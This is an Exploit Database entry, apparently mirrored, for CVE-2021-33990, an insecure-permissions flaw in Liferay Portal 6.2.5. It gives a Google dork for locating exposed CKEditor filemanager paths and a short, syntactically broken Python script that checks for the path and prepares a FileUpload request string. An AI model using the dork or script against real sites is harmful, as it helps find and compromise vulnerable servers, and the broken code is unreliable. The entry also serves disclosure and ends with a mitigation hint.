Liferay Portal 6.2.5 – Insecure Permissions

• Exploit Database
• 12 阅读

• 作者： Fu2x2000
  日期： 2023-04-05
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/51244/

• # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
  # Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
  # Date: 2021/05
  # Exploit Author: fu2x2000
  # Version: Liferay Portal 6.2.5 or later
  # CVE : CVE-2021-33990
  
   import requests
  import json
  
  print (" Search this on Google #Dork for liferay
  -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")
  
  url ="URL Goes Here
  /html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
  req = requests.get(url)
  print req
  sta = req.status_code
  if sta == 200:
  print ('Life Vulnerability exists')
  cook = url
  print cook
  inject = "Command=FileUpload&Type=File&CurrentFolder=/"
  #cook_inject = cook+inject
  #print cook_inject
  else:
  print ('not found try a another method')
  
  
  print ("solution restrict access and user groups")